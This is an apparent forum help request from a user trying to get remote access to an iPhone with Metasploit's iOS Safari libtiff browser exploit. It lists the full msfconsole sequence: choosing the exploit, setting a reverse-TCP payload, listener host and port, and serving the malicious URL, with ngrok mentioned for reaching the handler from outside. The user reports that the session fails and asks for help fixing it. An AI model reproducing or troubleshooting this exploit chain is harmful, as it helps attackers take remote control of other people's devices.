I have been trying to create a remote access to my Iphone using metasploit version 4.16.42 -dev
i have been using "exploit/appleios/browser/safarilibtiff"
and payload "osx/armle/execute/reverse_tcp"
I have been using my internal ip... I tried to use ngrok external ip once, then the link was successfully opened and the session was created, but the handler could not connect , and the session was also immediately closed with an error.
This is what i have been doing...
msf > use exploit/appleios/browser/safarilibtiff
msf exploit(safari_libtiff) > set URIPATH /ipwn
URIPATH => /ipwn
msf exploit(safarilibtiff) > set PAYLOAD osx/armle/execute/reversetcp
PAYLOAD => osx/armle/execute/reverse_tcp
msf exploit(safari_libtiff) > set LHOST xxx.xxx.x.xxx
LHOST => xxx.xxx.x.xxx
msf exploit(safari_libtiff) > set LPORT 4444
LPORT => 4444
msf exploit(safari_libtiff) > exploit
Started reverse handler
Using URL: 0.0.0.0:8080/ipwn
Local IP: xxxx.xxx.x.xxx:8080/ipwn
Server started.
* Exploit running as background job.
msf exploit(safari_libtiff) >
Expected behavior
when the URL is opened in the safari browser, it should create a session that i can interact with.
Current behavior
What happens instead is that the link can not be opened in the safari browser in my iphone and the session is therefore not created
System stuff
Metasploit version 4.16.42 -dev
OS
Kali Linux
Comments
No Comments Exist
Be the first, drop a comment!